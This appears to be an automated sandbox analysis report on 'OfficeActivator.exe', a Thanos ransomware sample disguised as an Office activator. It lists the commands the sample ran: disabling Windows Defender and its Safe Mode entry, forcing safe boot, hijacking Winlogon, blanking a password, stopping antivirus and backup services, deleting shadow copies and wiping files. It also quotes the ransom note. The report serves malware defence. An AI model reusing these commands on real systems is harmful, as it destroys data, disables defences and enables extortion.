Analysis Overview
SHA256
8441f92e8460a7b2ed37ee96affe547a65589b2e8e980a18a6b08b786b48465d
Threat Level: Known bad
The file OfficeActivator.exe was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Modifies WinLogon for persistence
Thanos executable
Disables service(s)
Contains code to disable Windows Defender
Thanos family
Renames multiple (60) files with added filename extension
Deletes shadow copies
Modifies boot configuration data using bcdedit
Downloads MZ/PE file
Blocklisted process makes network request
Checks computer location settings
Impair Defenses: Safe Mode Boot
Drops startup file
Windows security modification
Legitimate hosting services abused for malware hosting/C2
Modifies WinLogon
Enumerates connected drives
Launches sc.exe
System Network Configuration Discovery: Internet Connection Discovery
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Interacts with shadow copies
Runs ping.exe
Modifies registry key
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-08 19:04
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Thanos executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Thanos family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 19:04
Reported
2024-11-08 19:04
Platform
win7-20240903-en
Max time kernel
3s
Max time network
4s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\OfficeActivator.exe,C:\\Windows\\system32\\userinit.exe" | C:\Windows\system32\reg.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Impair Defenses: Safe Mode Boot
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefend | C:\Windows\system32\reg.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe
"C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe"
C:\Windows\system32\reg.exe
"reg.exe" delete HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend /f
C:\Windows\system32\bcdedit.exe
"bcdedit.exe" /set {default} safeboot network
C:\Windows\system32\reg.exe
"reg.exe" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe","C:\Windows\system32\userinit.exe" /f
C:\Windows\system32\net.exe
"net.exe" user Admin ""
C:\Windows\system32\shutdown.exe
"shutdown.exe" /r /t 0
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user Admin ""
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
Network
Files
memory/2380-0-0x000007FEF5BA3000-0x000007FEF5BA4000-memory.dmp
memory/2380-1-0x00000000002B0000-0x00000000002CA000-memory.dmp
memory/2380-2-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp
memory/2380-3-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp
memory/2756-4-0x0000000002D90000-0x0000000002D91000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-08 19:04
Reported
2024-11-08 19:06
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
149s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Disables service(s)
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Deletes shadow copies
Renames multiple (60) files with added filename extension
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\h: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\e: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\e: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\h: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\g: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\g: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe
"C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Windows\SYSTEM32\net.exe
"net.exe" stop avpsus /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop McAfeeDLPAgentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop mfewc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BMR Boot Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop DefWatch /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccEvtMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccSetMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop SavRoam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop RTVscan /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBFCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBIDPService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBCFMonitorService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooBackup /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooIT /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop zhudongfangyu /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop stc_raw_agent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VSNAPVSS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop veeam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CASAD2DWebSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CAARCUpdateSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop sophos /y
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe
C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.poweradmin.com | udp |
| US | 52.1.55.52:443 | www.poweradmin.com | tcp |
| US | 8.8.8.8:53 | 228.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.55.1.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cutewallpaper.org | udp |
| US | 104.21.37.179:443 | cutewallpaper.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 179.37.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
memory/1524-0-0x0000000000B90000-0x0000000000BAA000-memory.dmp
memory/1524-1-0x00007FFBCB870000-0x00007FFBCBA65000-memory.dmp
memory/1524-2-0x00007FFBCB870000-0x00007FFBCBA65000-memory.dmp
memory/432-3-0x00007FFBCB870000-0x00007FFBCBA65000-memory.dmp
memory/432-13-0x000001539DDB0000-0x000001539DDD2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mltuvifn.yto.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/432-16-0x00007FFBCB870000-0x00007FFBCBA65000-memory.dmp
C:\ProgramData\Microsoft\User Account Pictures\HOW_TO_DECYPHER_FILES.txt
| MD5 | 00dd1d8e8756229b0e703bcca9c8fa87 |
| SHA1 | 97412aab7aa0663cd7bf7803549c5507834cfdf6 |
| SHA256 | 6d4eabdf7bf6a550fed6004e1636053785b0e877f00e8d624af2f4989a544ae4 |
| SHA512 | 14f3de03ad13eaf8e9ec5175c003a2f4e585ed128a724cbc7c446c717970613f6042ad286f91126391ca7574b9d4610a7ca4e97a77167e7a4247d7e21297f028 |
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
| MD5 | a08c7c1f9d09a5e493729ff3523b3485 |
| SHA1 | d8392f27046921e1d9c32120b683f207e6f2821d |
| SHA256 | d066f2aeebe7aae32e12b412b505b4528215bce7d9c4efb054450fb0c471d2ad |
| SHA512 | 5345d07e3818b243f4bfcef78ddbc417a108989a97954952798a2bbef2840fda289af1b1c64f4682d0ecfad52e1899858e8bd5462d22dba559c0563214cc2053 |
memory/1524-137-0x00007FFBCB870000-0x00007FFBCBA65000-memory.dmp